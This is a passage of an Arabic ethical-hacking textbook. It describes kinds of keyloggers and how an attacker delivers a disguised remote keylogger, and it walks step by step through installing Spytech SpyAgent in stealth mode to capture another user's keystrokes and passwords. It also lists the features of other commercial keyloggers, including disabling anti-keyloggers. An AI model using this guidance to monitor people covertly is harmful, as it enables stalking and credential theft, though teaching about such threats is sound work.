‫وﻏﯾر ﻗﺎﺑل ﻟﻠﻛﺷف ﺣﺗﻰ ﻣﻊ اﻷدوات اﻟﻘﯾﺎﺳﯾﺔ أو اﻷدوات اﻟﻣﺗﺧﺻﺻﺔ‪.‬‬
‫‪Device Driver Keylogger -‬‬
‫ھذا اﻟﻧوع ﻣن اﻟﻛﯾﻠوﺟرز ﯾﻌﻣل ﻋﺎدة ك ‪ .Device Driver‬ھو ﯾﺣل ﻣﺣل ‪ I/O driver‬ﻣﻊ وظﯾﻔﺔ ال ‪ Keylogging‬اﻟﻣﺿﻣﻧﺔ‪ .‬ﯾﺗم ﺣﻔظ‬
‫ﻛﺎﻓﺔ اﻟﻣﻔﺎﺗﯾﺢ اﻟﺗﻲ أﺟرﯾت ﻋﻠﻰ اﻟﻛﻣﺑﯾوﺗر ﻟﺗﺳﺟﯾل اﻟدﺧول ﻓﻲ ﻣﻠف ﻣﺧﻔﻲ وﻣن ﺛم ﯾﺗم إرﺳﺎﻟﮭﺎ إﻟﻰ اﻟوﺟﮭﺔ ﻣن ﺧﻼل ﺷﺑﻛﺔ اﻹﻧﺗرﻧت‪ .‬ﯾﺗم إﺧﻔﺎء‬
‫ﻣﻠﻔﺎت اﻟﺳﺟل اﻟﺗﻲ ﯾﺗم إرﺳﺎﻟﮭﺎ إﻟﻰ اﻟوﺟﮭﺔ واﻟﺗﻲ ﻛﺗﺑت ﺑواﺳطﺔ اﻟﻛﯾﻠوﺟرز ھذا وأﻧﮭﺎ ﯾﺻﻌب ﺗﻣﯾزھﺎ ﻋن ﻣﻠﻔﺎت ﻧظﺎم اﻟﺗﺷﻐﯾل‪ ،‬ﺣﺗﻰ أﺛﻧﺎء‬
‫اﻟﻘﯾﺎم ﺑﺳرد اﻟﻣﻠﻔﺎت اﻟﻣﺧﻔﯾﺔ واﻟﻣﺟﻠدات‪.‬‬

‫‪https://www.facebook.com/tibea2004‬‬ ‫د‪ .‬ﻣﺣﻣد ﺻﺑﺣﻲ طﯾﺑﮫ‬


‫‪405‬‬

‫‪Hypervisor-based Keylogger -‬‬


‫ﺗم ﺑﻧﺎء )‪ (Hypervisor-based Keylogger‬ﺿﻣن ﺑرﻣﺟﯾﺎت ‪ Hypervisor‬اﻟﺧﺑﯾﺛﺔ اﻟﺗﻲ ﺗﻌﻣل ﺗﺣت ﻧظﺎم اﻟﺗﺷﻐﯾل وﻻ ﯾﻣﻛن أن ﯾﻧظر‬
‫إﻟﯾﮫ ﺟﺳدﯾﺎ أو ﻟﻣﺳﮭﺎ‪ .‬أﻧﮭﺎ ﻣﺛل أﻧظﻣﺔ اﻟﺗﺷﻐﯾل اﻟوھﻣﯾﺔ)‪. (virtual machines‬‬
‫‪Form Grabber-Based Keylogger -‬‬
‫ﻓﻲ ‪ ،Form Grabber-Based Keylogger‬ﺣﯾث ﯾﺗم ﺗﺳﺟﯾل ﺑﯾﺎﻧﺎت ﻧﻣﺎذج اﻟوﯾب ﻋﻠﻰ ﺷﺑﻛﺔ اﻹﻧﺗرﻧت أوﻻ ﺛم ﺑﻌد ﺗﻘدﯾﻣﮫ ﻋﺑر‬
‫اﻹﻧﺗرﻧت‪ ،‬ﻓﺈﻧﮫ ﯾﺗﺟﺎوز ﺗﺷﻔﯾر ‪ ،Form Grabber-Based Keylogger .HTTPS‬ﯾﻘوم ﺑﺗﺳﺟﯾل ﻣدﺧﻼت ﻧﻣوذج اﻟوﯾب ﻋن طرﯾﻖ‬
‫ﺗﺳﺟﯾل ﺗﺻﻔﺢ اﻟوﯾب اﻟﻘﺎﺋﻣﺔ ﻋﻠﻰ ﻧﻔس اﻟوظﯾﻔﺔ‪.‬‬

‫ﻣﻧﮭﺟﯾﺔ اﻟﮭﺎﻛرز ﻓﻲ اﺳﺗﺧدام ‪ Keyloggers‬ﻋن ﺑﻌد )‪(Methodology Of Attacker In Using Remote Keylogger‬‬
‫ﻟﻌرض اﻟﺑﯾﺎﻧﺎت ﻋن ﺑﻌد‪ ،‬ﻓﺎن اﻟﻣﮭﺎﺟم ﯾﻘوم أوﻻ ﺑﺈﻧﺷﺎء ﻣﻠف ﺗﻧﻔﯾذي ﺧﺑﯾث )‪ (malicious executable file‬وإرﺳﺎل ھذا اﻟﻣﻠف ﻟﻠﺿﺣﯾﺔ‬
‫ﻋن طرﯾﻖ اﻟﺑرﯾد اﻻﻟﻛﺗروﻧﻲ )أي إﺧﻔﺎء ﻣﻠف ﺿﺎر وراء ﻣﻠف ﺣﻘﯾﻘﻲ‪ ،‬ﻣﺛل ﺻورة أو أﻏﻧﯾﺔ(‪ ،‬أو ﻏﯾر ذﻟك ﻣن ﺧداع اﻟﻣﺳﺗﺧدم ﻟﺗﺣﻣﯾﻠﮫ ﻣن‬
‫ﻣوﻗﻊ ﻋﻠﻰ ﺷﺑﻛﺔ اﻻﻧﺗرﻧت أو ﺧﺎدم اﻟﺧﺑﯾﺛﺔ‪ .‬ﺑﻣﺟرد أن ﯾﻧﻘر اﻟﺿﺣﯾﺔ ﻋﻠﻰ ھذا اﻟﻣﻠف اﻟﺧﺑﯾث‪ ،‬ﯾﺗم ﺗﺛﺑﯾت ﻛﻠوﻏر ﻋﻠﻰ اﻟﻧظﺎم واﻟﺿﺣﯾﺔ ﻻ ﯾﻌرف‬
‫أﻧﮫ ﺗم ﺗﺛﺑﯾت ﺑرﻧﺎﻣﺞ اﻟﻛﯾﻠوﺟرز ﻋﻠﻰ اﻟﻧظﺎم ﻛﻣﺎ أﻧﮫ أﯾﺿﺎ ﻏﯾر ﻣرﺋﻲ ﺑﺎﻟﻧﺳﺑﺔ ﻟﻠﺿﺣﯾﺔ‪ Keylogger .‬ﯾﻘوم ﺑﺟﻣﻊ ﻛل ﺿﻐطﺔ ﯾﺗم ﻛﺗﺎﺑﺗﮭﺎ ﻣن‬
‫ﻗﺑل اﻟﻣﺳﺗﺧدم ﺳرا ﺛم ﯾﻘوم ﺑﺣﻔظﮭﺎ إﻟﻰ ﻣﻠف ﻧﺻﻲ أو ﻣﻠف اﻟﺳﺟل‪ .‬ﻗد ﯾﺣﺗوي ﻣﻠف اﻟﺳﺟل ﻋﻠﻰ ﻣﻌﻠوﻣﺎت ﺣﺳﺎﺳﺔ ﻣﺛل أرﻗﺎم اﻟﺣﺳﺎﺑﺎت‬
‫اﻟﻣﺻرﻓﯾﺔ وﻛﻠﻣﺎت اﻟﺳر وأرﻗﺎم ﺑطﺎﻗﺎت اﻻﺋﺗﻣﺎن وأرﻗﺎم اﻟﮭواﺗف واﻟﻌﻧﺎوﯾن واﻟﺦ‪ .‬ﺑﻣﺟرد ارﺗﺑﺎط اﻟﺿﺣﯾﺔ ﺑﺎﻹﻧﺗرﻧت‪ ،‬ﯾﺗم إرﺳﺎل ھذه اﻟﻣﻠﻔﺎت‬
‫إﻟﻰ ﻣوﻗﻊ ﺑﻌﯾد ﻛﻣﺎ ﺗم اﻋداده ﻣن ﻗﺑل اﻟﻣﮭﺎﺟم‪ .‬ھﻧﺎ اﻟﻣﮭﺎﺟم ﻻ ﯾﺣﺗﺎج إﻟﻰ اﻟوﺻول اﻟﻔﻌﻠﻲ إﻟﻰ ﺟﮭﺎز اﻟﺿﺣﯾﺔ‪.‬‬

‫‪Acoustic/CAM Keyloggers‬‬

‫‪ Acoustic Keyloggers‬ﯾﻌﻣل ﻋﻠﻰ ﻣﺑدأ ﺗﺣوﯾل اﻟﻣوﺟﺎت اﻟﺻوﺗﯾﺔ إﻟﻰ ﺑﯾﺎﻧﺎت ﻛﮭروﻣﻐﻧﺎطﯾﺳﯾﺔ‪ .‬ھذا اﻟﻣﻔﮭوم ھو أن ﻛل ﻣﻔﺗﺎح ﻋﻠﻰ ﻟوﺣﺔ‬
‫اﻟﻣﻔﺎﺗﯾﺢ ﻟﮫ ﺻوت ﻣﺧﺗﻠف ﻗﻠﯾﻼ ﻋﻧد اﻟﺿﻐط ﻋﻠﯾﮫ‪ .‬ھﻧﺎك أﺟﮭزة ﺗﻧﺻت اﻟﺗﻲ ھﻲ ﻗﺎدرة ﻋﻠﻰ اﻟﻛﺷف ﻋن اﻻﺧﺗﻼﻓﺎت اﻟدﻗﯾﻘﺔ ﺑﯾن اﻷﺻوات ﻣﻊ‬
‫ﻛل ﺿﻐطﺔ ﻣﻔﺗﺎح واﺳﺗﺧدام ھذه اﻟﻣﻌﻠوﻣﺎت ﻟﺗﺳﺟﯾل ﻣﺎ ﯾﺗم ﻛﺗﺎﺑﺗﮭﺎ ﻣن ﻗﺑل اﻟﻣﺳﺗﺧدم‪.‬‬
‫‪ The acoustic Keylogger‬ﯾﺗطﻠب اﻟﻛﺛﯾر ﻣن اﻟﺗﻌﻠم "‪ "learning period‬أي ﺣواﻟﻰ ‪ 1،000‬أو أﻛﺛر ﻣن اﻟﺿﻐطﺎت ﻟﺗﺣوﯾل‬
‫اﻷﺻوات اﻟﻣﺳﺟﻠﺔ اﻟﻰ ﺑﯾﺎﻧﺎت‪ .‬ﯾﺗم ذﻟك ﻣن ﺧﻼل ﺗطﺑﯾﻖ ﺧوارزﻣﯾﺔ ﺗردد اﻷﺻوات اﻟﻣﺳﺟﻠﺔ‪ .‬ﻟﺗﺣدﯾد ﺗواﻓﻖ اﻟﺻوت ﻣﻊ أي ﻣﻔﺗﺎح‪ ،‬ﯾﺳﺗﺧدم‬
‫‪ acoustic Keylogger‬اﻟﺑﯾﺎﻧﺎت اﻹﺣﺻﺎﺋﯾﺔ ﻋﻠﻰ أﺳﺎس اﻟﺗردد اﻟذي ﯾﺳﺗﺧدم ﻣﻊ ﻛل ﻣﻔﺗﺎح ﻷﻧﮫ ﺳﯾﺗم اﺳﺗﺧدام ﺑﻌض اﻟﺣروف أﻛﺛر ﺑﻛﺛﯾر‬
‫ﻣن ﻏﯾرھﺎ‪.‬‬

‫‪ A CAM Keylogger‬ﯾﺟﻌل اﺳﺗﺧدام اﻟﻛﺎﻣﯾرا ﻟﺗﺳﺟﯾل ﺿرﺑﺎت اﻟﻣﻔﺎﺗﯾﺢ‪ .‬ﺣﯾث ﺗﻘوم اﻟﻛﺎﻣﯾرا اﻟﻣﺛﺑﺗﺔ ﺑﺄﺧذ ﻟﻘطﺎت ﻣن ﺿرﺑﺎت اﻟﻣﻔﺎﺗﯾﺢ ﺛم‬
‫ﺗﻘوم ﺑرﺻدھﺎ وﻣن ﺛم ارﺳﺎل ﺳﺟل اﻟﻠﻘطﺎت إﻟﻰ ﺣﺳﺎب اﻟﻣﮭﺎﺟم ﻋﻠﻰ ﻓﺗرات دورﯾﺔ‪ .‬ﯾﻣﻛن ﻟﻠﻣﮭﺎﺟم اﺳﺗرداد اﻟﻣﻌﻠوﻣﺎت ﻣن ﺧﻼل اﻟﺗﺣﻘﯾﻖ ﻣن‬
‫ﻟﻘطﺎت اﻟﺷﺎﺷﺔ اﻟﺗﻲ ﺗم إرﺳﺎﻟﮭﺎ ﻣن ﻗﺑل ‪.CAM Keylogger‬‬

‫‪https://www.facebook.com/tibea2004‬‬ ‫د‪ .‬ﻣﺣﻣد ﺻﺑﺣﻲ طﯾﺑﮫ‬


‫‪406‬‬

‫‪Keyloggers‬‬
‫ﺑﺟﺎﻧب اﻟﻣﻌﻠوﻣﺎت اﻟﺗﻲ ﺗﻣت ﻣﻧﺎﻗﺷﺗﮭﺎ ﺳﺎﺑﻘﺎ‪ ،acoustic/CAM Keyloggers ،‬ﻓﮭﻧﺎك ﻛﯾﻠوﺟرز أﺧرى ﺧﺎرﺟﯾﺔ واﻟﺗﻲ ﯾﻣﻛﻧك اﺳﺗﺧداﻣﮭﺎ‬
‫ﻟﻣراﻗﺑﺔ ﺿرﺑﺎت اﻟﻣﻔﺎﺗﯾﺢ ﻣن اﻟﻧظﺎم ﻟﺷﺧص ﻣﺎ‪ .‬ﯾﻣﻛن أن ﺗﻌﻠﻖ ھذه ﻛﯾﻠوﺟرز اﻟﺧﺎرﺟﯾﺔ ﺑﯾن ﻟوﺣﺔ ﻣﻔﺎﺗﯾﺢ اﻟﻛﻣﺑﯾوﺗر اﻟﻣﻌﺗﺎدة وﺟﮭﺎز ﻛﻣﺑﯾوﺗر‬
‫ﻟﺗﺳﺟﯾل ﻛل ﺿﻐطﺔ ﻣﻔﺗﺎح‪.‬‬

‫ﯾﻣﻛﻧك اﺳﺗﺧدام أﺟﮭزة ﻛﯾﻠوﺟرز اﻟﺧﺎرﺟﯾﺔ اﻟﺗﺎﻟﯾﺔ ﻟﻣراﻗﺑﺔ ﻧﺷﺎط اﻟﻣﺳﺗﺧدم‪:‬‬

‫‪https://www.facebook.com/tibea2004‬‬ ‫د‪ .‬ﻣﺣﻣد ﺻﺑﺣﻲ طﯾﺑﮫ‬


‫‪407‬‬

‫‪Keylogger: Spytech SpyAgent‬‬


‫اﻟﻣﺻدر‪http://www.spytech-web.com :‬‬

‫‪ Spytech SpyAgent‬ھو ﺑرﻧﺎﻣﺞ ﻟﺗﺳﺟﯾل ﺿﻐطﺎت اﻟﻣﻔﺎﺗﯾﺢ واﻟذي ﯾﺳﻣﺢ ﻟك ﺑﻣراﻗﺑﺔ ﺿرﺑﺎت اﻟﻣﻔﺎﺗﯾﺢ ﻟﻠﻛﻣﺑﯾوﺗر اﻟﻣﺳﺗﺧدم اﻟذي ﺗم‬
‫اﻟﺗﺛﺑﯾت ﻋﻠﯾﮫ‪ .‬ﻓﺈﻧﮫ ﯾﻣﻛن أﯾﺿﺎ أن ﯾﺳﻣﺢ ﻟك ﺑﻣراﻗﺑﺔ اﻷﻣور اﻟﺗﺎﻟﯾﺔ ﻋﻠﻰ ﺟﮭﺎز ﻛﻣﺑﯾوﺗر اﻟﻣﺳﺗﺧدم‪:‬‬
‫‪ -‬ﯾﻛﺷف ﻋن اﻟﻣواﻗﻊ اﻟﺗﻲ ﺗﻣت زﯾﺎرﺗﮭﺎ‪.‬‬
‫‪ -‬ﯾﺳﺟل ﺟﻣﯾﻊ ﻋﻣﻠﯾﺎت اﻟﺑﺣث اﻟﺗﻲ ﻧﻔذت ﻋﻠﻰ اﻻﻧﺗرﻧت‪.‬‬
‫‪ -‬ﻣراﻗﺑﺔ ﻣﺎ ھﻲ اﻟﺑراﻣﺞ واﻟﺗطﺑﯾﻘﺎت ﻗﯾد اﻻﺳﺗﺧدام‪.‬‬
‫‪ -‬ﯾﺳﺟل ﻛل اﺳﺗﺧدام اﻟﻣﻠﻔﺎت واﻟﻣﻌﻠوﻣﺎت اﻟطﺑﺎﻋﺔ‪.‬‬
‫‪ -‬ﯾﺳﺟل ﻣﺣﺎدﺛﺎت اﻟدردﺷﺔ ﻋﻠﻰ اﻻﻧﺗرﻧت‪.‬‬
‫‪ -‬ﺑل ھو أﯾﺿﺎ ﻗﺎدرا ﻋﻠﻰ رؤﯾﺔ ﻛل اﻻﺗﺻﺎل ﻋﺑر اﻟﺑرﯾد اﻻﻟﻛﺗروﻧﻲ ﻋﻠﻰ اﻟﻛﻣﺑﯾوﺗر اﻟﻣﺳﺗﺧدم‪.‬‬
‫‪ -‬ﯾﺳﺎﻋد ﻋﻠﻰ ﺗﺣدﯾد ھل اﻟﻣﺳﺗﺧدم ﯾﻘوم ﺑﺎﻟﺗﺣﻣﯾل)‪ (downloading‬أو ﯾﻘوم ﺑﺎﻟرﻓﻊ )‪.(uploading‬‬
‫‪ -‬ﯾﻛﺷف ﻛﻠﻣﺎت اﻟﺳر ﻟﻠﻣﺳﺗﺧدم اﻟﺳرﯾﺔ‪.‬‬
‫ﯾﻣﻛﻧك ﺗﺣﻣﯾل ھذا اﻟﺑرﻧﺎﻣﺞ ﻣن اﻟﻣوﻗﻊ اﻟرﺳﻣﻲ ﻟﮫ وﺗﺛﺑﯾﺗﮫ ﻋﻠﻰ اﻟﻛﻣﺑﯾوﺗر اﻟذي ﺗرﯾد ﻣراﻗﺑﺗﮫ‪ ،‬وﺑﻌد ذﻟك ﻓﻘط اﻧﻘر ﻓوق ﺑدء اﻟرﺻد‪ .‬ھذا ﻛل‬
‫ﺷﻲء وﺳوف ﯾﺳﺟل ﻋدد ﻣن اﻻﻣور ﺑﺎﻟﻧﺳﺑﺔ ﻟك ﺣول ﻧﺷﺎط اﻟﻣﺳﺗﺧدم ﻋﻠﻰ اﻟﻛﻣﺑﯾوﺗر‪.‬‬
‫‪ -1‬ﻧﺑدأ ﻋﻣﻠﯾﺔ اﻟﺗﺛﺑﯾت ﻋن طرﯾﻖ إﺗﺑﺎع ‪ Wizard‬اﻟﺧﺎص ﺑﻌﻣﻠﯾﺔ اﻟﺗﺛﺑﯾت ﺣﺗﻰ ﻧﺻل اﻟﻰ ھذه اﻟﻣرﺣﻠﺔ ﻣن ﻋﻣﻠﯾﺔ اﻟﺗﺛﺑﯾت‪:‬‬

‫‪ -2‬ﻓﻲ ھذه اﻟﻣرﺣﻠﺔ ﻣن ﻋﻣﻠﯾﺔ اﻟﺗﺛﺑﯾت ﻧﺧﺗﺎر ‪ Administrator/Tester‬ﺛم ﻧﻘوم ﺑﺎﻟﻧﻘر ﻓوق ‪ Next‬ﺣﺗﻰ ﻧﺻل اﻟﻰ اﻟﺷﺎﺷﺔ اﻟﺗﺎﻟﯾﺔ‪:‬‬

‫‪ -3‬ﻧﻧﻘر ﻓوق ‪ Yes‬ﺛم ‪ Next‬ﺣﺗﻰ ﺗظﮭر اﺧر ﻣرﺣﻠﮫ وﻓﯾﮭﺎ ﻧﻧﻘر ﻓوق ‪ Close‬ﺣﺗﻰ ﻧﻧﺗﮭﻲ ﻣن ﻋﻣﻠﯾﮫ اﻟﺗﺛﺑﯾت ﺛم ﺗظﮭر ﺷﺎﺷﮫ اﻟﺗطﺑﯾﻖ‬
‫اﻷﺳﺎﺳﯾﺔ وﻧﻧﻘر ﻓوق ‪ continue‬ﺣﺗﻰ ﺗظﮭر اﻟﺷﺎﺷﺔ اﻟﺗﺎﻟﯾﺔ واﻟﺗﻲ ﺗطﻠب ادﺧﺎل ﻛﻠﻣﺔ اﻟﻣرور ﻛﺎﻻﺗﻰ‪:‬‬

‫‪ -4‬ﻣن ﺧﻼل ھذه اﻟﺷﺎﺷﺔ ﻧﻘوم ﺑﺈدﺧﺎل ﻛﻠﻣﺔ اﻟﻣرور اﻟﺗﻲ ﺗرﯾدھﺎ ﺛم ﻧﻧﻘر ﻓوق ‪.OK‬‬
‫‪ -5‬ﺗظﮭر رﺳﺎﻟﺔ ﺗﺧﺑرك ﺑﻧﺟﺎح اﺳﺗﺧدام ﻛﻠﻣﺔ اﻟﻣرور ﺛم ﺑﻌد ذﻟك ﻧﻧﻘر ﻓوق ‪ Continue‬ﺣﺗﻰ ﺗظﮭر ﺷﺎﺷﺔ اﻻﻋداد اﻟﺗﺎﻟﯾﺔ‪:‬‬
‫‪https://www.facebook.com/tibea2004‬‬ ‫د‪ .‬ﻣﺣﻣد ﺻﺑﺣﻲ طﯾﺑﮫ‬
‫‪408‬‬

‫‪ -6‬ﻣن ﺧﻼل ھذه اﻟﺷﺎﺷﺔ ﻧﺧﺗﺎر ‪ Complete + Stealth Configuration‬ﺛم ﻧﻧﻘر ﻓوق ‪ Next‬ﺛم اﻟﻣرﺣﻠﺔ اﻟﺗﺎﻟﯾﺔ ﻣن ﻋﻣﻠﯾﺔ‬
‫اﻻﻋداد ﻧﺧﺗﺎر ﻣن ﻣﺟﻣوﻋﺔ ﺧﯾﺎرات اﺿﺎﻓﯾﮫ ‪ Display Alert at Startup‬ﺛم ﻧﻧﻘر ﻓوق ‪ Next‬ﺣﺗﻰ ﻧﺻل اﻟﻰ ﻣرﺣﻠﺔ ‪Finish‬‬
‫وﻧﻧﺗﮭﻲ ﻣن ﻋﻣﻠﯾﺔ اﻻﻋداد‪.‬‬
‫‪ -7‬ﺑﻌد اﻻﻧﺗﮭﺎء ﻣن ﻋﻣﻠﯾﺔ اﻻﻋداد واﻟﻧﻘر ﻓوق ‪ Finish‬ﺗظﮭر ﺷﺎﺷﮫ أﺧرى ﻧﻧﻘر ﻓوق ‪ Continue‬ﺣﺗﻰ ﺗظﮭر اﻟﺷﺎﺷﺔ اﻟرﺋﯾﺳﯾﺔ ﻟﻠﺗطﺑﯾﻖ‬
‫ﻛﺎﻻﺗﻰ‪:‬‬

‫‪ -8‬ﻟرؤﯾﺔ ﻧﺷﺎط اﻟﻣﺳﺗﺧدم اﻟﻌﺎﻣﺔ ﻧﻘوم ﺑﺎﻟﻧﻘر ﻓوق ‪.Start Monitoring‬‬


‫‪ -9‬واﻟﺗﻲ ﺗؤدى اﻟﻰ ظﮭور ﺷﺎﺷﮫ ﺗرﯾد ﻣﻧك إدﺧﺎل ﻛﻠﻣﺔ اﻟﻣرور‪ ،‬ﺑﻌد إدﺧﺎل ﻛﻠﻣﺔ اﻟﻣرور ﻧﻧﻘر ﻓوق ‪ Ok‬واﻟﺗﻲ ﺗؤدى اﻟﻰ ظﮭور‬
‫اﻟﺷﺎﺷﺔ اﻟﺗﺎﻟﯾﺔ‪:‬‬

‫‪https://www.facebook.com/tibea2004‬‬ ‫د‪ .‬ﻣﺣﻣد ﺻﺑﺣﻲ طﯾﺑﮫ‬


‫‪409‬‬

‫‪ -10‬ھذه اﻟﺷﺎﺷﺔ ﺗﺧﺑرك اﻧﮫ ﻛﻠﻰ ﺗﻘوم ﺑﺎﻻﻧﺗﻘﺎل اﻟﻰ ‪ Stealth mode‬ﯾﻣﻛﻧك ذﻟك ﻣن ﺧﻼل اﻟﻧﻘر ﻓوق ‪.Ctrl+Shift+Alt+M‬‬
‫‪ -11‬ﻧﻘوم ﺑﺎﻟﻧﻘر ﻓوق ‪ ok‬ﻟﯾﺑدأ ﺑﻌﻣﻠﯾﺔ رﺻد ﻧﺷﺎط اﻟﺟﮭﺎز واﻟﺗﻲ ﺗؤدى اﻟﻰ ظﮭور رﺳﺎﻟﺔ ﻧﻧﻘر ﻓوق ‪.Continue‬‬
‫‪ -12‬اﻻن ﻗم ﺑﺗﺻﻔﺢ اﻻﻧﺗرﻧت‪ ،‬ﺛم ﺑﻌد ذﻟك ﻧﻘوم ﺑﺈﺣﺿﺎر ‪ Stealth mode‬ﻋن طرﯾﻖ اﻟﻧﻘر ﻓوق‪. Ctrl+Shift+Alt+M‬‬
‫‪ -13‬ﺗؤدى اﻟﻰ ظﮭور ﺷﺎﺷﮫ ﯾطﻠب ﻓﯾﮭﺎ ﻣﻧك ﻛﻠﻣﺔ اﻟﻣرور ﻧﻘوم ﺑﺈدﺧﺎل ﻛﻠﻣﺔ اﻟﻣرور ﺛم اﻟﻧﻘر ﻓوق ‪ .Ok‬ﺛم ﺑﻌد ذﻟك ﺗظﮭر ﺷﺎﺷﮫ اﻟﺗطﺑﯾﻖ‬
‫اﻟرﺋﯾﺳﯾﺔ‪.‬‬
‫‪ -14‬ﻟرؤﯾﺔ ﻣﺎ ﻗﺎم ﺑﮫ اﻟﻣﺳﺗﺧدم ﻣن اﻟﻧﻘر ﻋﻠﻰ ﻟوﺣﺔ اﻟﻣﻔﺎﺗﯾﺢ ﻧﻘوم ﺑﺎﺧﺗﯾﺎر ‪ Keystrokes Typed‬واﻟﺗﻲ ﺳوف ﯾﻌرض ﻣﺎ ﻗﺎم ﺑﮫ‬
‫اﻟﻣﺳﺗﺧدم ﻣن اﻟﻧﻘر ﻓوق ﻟوﺣﺔ اﻟﻣﻔﺎﺗﯾﺢ ﻛﺎﻻﺗﻰ‪:‬‬

‫‪https://www.facebook.com/tibea2004‬‬ ‫د‪ .‬ﻣﺣﻣد ﺻﺑﺣﻲ طﯾﺑﮫ‬


‫‪410‬‬

‫‪Keylogger: All in One Keylogger‬‬


‫اﻟﻣﺻدر‪http://www.relytec.com :‬‬
‫‪ All in One Keylogger‬ھو ﺑرﻧﺎﻣﺞ ﻛﻠوﻏر ﻣراﻗﺑﺔ ﻏﯾر ﻣرﺋﻲ واﻟذي ﯾﺳﻣﺢ ﻟك ﺑﺗﺳﺟﯾل ﺿرﺑﺎت اﻟﻣﻔﺎﺗﯾﺢ وﻣراﻗﺑﺔ ﻛل ﻧﺷﺎط اﻟﻣﺳﺗﺧدم‬
‫ﻋﻠﻰ اﻟﻛﻣﺑﯾوﺗر‪ .‬ﻓﺈﻧﮫ ﯾﺳﻣﺢ ﻟك ﺑﺎﻟﺗﺗﺑﻊ ﺳرا ﻟﺟﻣﯾﻊ اﻷﻧﺷطﺔ ﻣن ﺟﻣﯾﻊ ﻣﺳﺗﺧدﻣﻲ اﻟﻛﻣﺑﯾوﺗر وﯾﺗﻠﻘﻰ ﻣﻠﻔﺎت اﻟﺳﺟل ﺗﻠﻘﺎﺋﯾﺎ ﻟﻠﺣﺳﺎﺑﺎت‬
‫‪ .email/FTP/LAN‬ﻛﻠوﻏر ﯾﻧﺷط ﻧﻔﺳﮫ ﺗﻠﻘﺎﺋﯾﺎ ﻋﻧد ﺑدء ﺗﺷﻐﯾل ‪ Windows‬وﯾﻛون ﻏﯾر ﻣرﺋﻲ ﺗﻣﺎﻣﺎ‪ .‬ﯾﻣﻛﻧك ﻓﻌل اﻷﺷﯾﺎء اﻟﺗﺎﻟﯾﺔ ﺑﺎﺳﺗﺧدام‬
‫ھذا اﻟﺑرﻧﺎﻣﺞ‪:‬‬
‫‪ -1‬اﻟﺗﻘﺎط ﺟﻣﯾﻊ ﺿرﺑﺎت اﻟﻣﻔﺎﺗﯾﺢ )اﻟﻣﻔﺎﺗﯾﺢ ﻣﺳﺟل(‪.‬‬
‫‪ -2‬ﺗﺳﺟﯾل اﻟرﺳﺎﺋل اﻟﻔورﯾﺔ‪.‬‬
‫‪ -3‬ﻣراﻗﺑﺔ اﺳﺗﺧدام اﻟﺗطﺑﯾﻖ‪.‬‬
‫‪ -4‬اﻟﺗﻘﺎط ﻧﺷﺎط ﺳطﺢ اﻟﻣﻛﺗب‪.‬‬
‫‪ -5‬اﻟﺗﻘﺎط ﺻوره ﻟﺳطﺢ اﻟﻣﻛﺗب )‪.(Capture Screenshot‬‬
‫‪ -6‬اﻟﺑﺣث اﻟﺳرﯾﻊ ﻓﻲ ﻣﻠﻔﺎت اﻟﺳﺟل‪.‬‬
‫‪ -7‬إرﺳﺎل اﻟﺗﻘﺎرﯾر ﻋﺑر اﻟﺑرﯾد اﻹﻟﻛﺗروﻧﻲ‪ ،FTP ،‬واﻟﺷﺑﻛﺔ‪.‬‬
‫‪ -8‬ﺗﺳﺟﯾل أﺻوات اﻟﻣﯾﻛروﻓون‪.‬‬
‫‪ -9‬إﻧﺷﺎء ﺗﻘﺎرﯾر ‪.HTML‬‬
‫‪ -10‬ﺗﻌطﯾل ‪.anti Keyloggers‬‬
‫‪ -11‬ﺗﻌطﯾل اﻟﺑراﻣﺞ اﻟﻐﯾر ﻣرﻏوب ﻓﯾﮭﺎ‪.‬‬
‫‪ -12‬ﻓﻠﺗرة رﺻد ﺣﺳﺎﺑﺎت اﻟﻣﺳﺗﺧدﻣﯾن‪.‬‬
‫‪ -13‬إرﺳﺎل ﺗﻘﺎرﯾر ‪.FTP‬‬
‫‪ -14‬إرﺳﺎل ﺗﻘﺎرﯾر ﺑﺗﻧﺳﯾﻖ ‪.HTML‬‬
‫‪ -15‬ﻣﻧﻊ ﻋﻧﺎوﯾن اﻟﻣواﻗﻊ اﻟﻐﯾر ﻣرﻏوب ﻓﯾﮭﺎ‪.‬‬
‫‪ -16‬وﻗف ﺗﺳﺟﯾل ﻋﻧدﻣﺎ ﯾﻛون اﻟﻛﻣﺑﯾوﺗر ﺧﺎﻣﻼ‪.‬‬

‫‪https://www.facebook.com/tibea2004‬‬ ‫د‪ .‬ﻣﺣﻣد ﺻﺑﺣﻲ طﯾﺑﮫ‬


411

Keyloggers for Windows


‫ ھﻧﺎك اﻟﻛﺛﯾر ﻣن ﺑرﻣﺟﯾﺎت ﻛﻠوﻏر اﻟﻣﺗﺎﺣﺔ ﻓﻲ اﻟﺳوق؛ ﯾﻣﻛﻧك اﻻﺳﺗﻔﺎدة ﻣن ھذه اﻷدوات ﻟﺗﺳﺟﯾل ﺿرﺑﺎت‬،‫إﻟﻰ ﺟﺎﻧب ﺷرح ﻛﻠوﻏر ﺳﺎﺑﻘﺎ‬
‫ ﯾﺗم اﺳﺗﺧداﻣﮭﺎ ﻟﺗﺳﺟﯾل ﺟﻣﯾﻊ ﺿرﺑﺎت اﻟﻣﻔﺎﺗﯾﺢ‬.‫ ﯾﺗم ﺳرد ھذه ﻛﻠوﻏر ﻋﻠﻰ اﻟﻧﺣو اﻟﺗﺎﻟﻲ‬.‫ ورﺻد ﻛل ﻧﺷﺎط اﻟﻣﺳﺗﺧدم ﻋﻠﻰ اﻟﻛﻣﺑﯾوﺗر‬،‫اﻟﻣﻔﺎﺗﯾﺢ‬
‫ ﯾﻣﻛﻧك ﺗﺣﻣﯾل ھذه اﻷدوات ﻣن اﻟﻣواﻗﻊ اﻟﺧﺎﺻﺔ ﺑﮭم ﻋﻠﻰ اﻟﻧﺣو اﻟﺗﺎﻟﻲ واﻟﺑدء ﻓﻲ اﺳﺗﺧداﻣﮭﺎ ﻟﻣراﻗﺑﺔ ﺿرﺑﺎت‬.‫ﻋﻠﻰ اﻟﻛﻣﺑﯾوﺗر اﻟﻣﺳﺗﺧدم‬
.‫اﻟﻣﻔﺎﺗﯾﺢ وﻏﯾرھﺎ ﻣن ﻧﺷﺎط اﻟﻣﺳﺗﺧدم ﻋﻠﻰ اﻟﻛﻣﺑﯾوﺗر‬
:‫ﺳﺗﺟد ھﻧﺎ ﻻﺋﺣﺔ ﻛﻠوﻏر اﻟﺗﻲ ﺗﻌﻣل ﻋﻠﻰ ﻧظﺎم اﻟﺗﺷﻐﯾل وﯾﻧدوز‬
Ultimate Keylogger available at http://ultimatekeylogger.com/
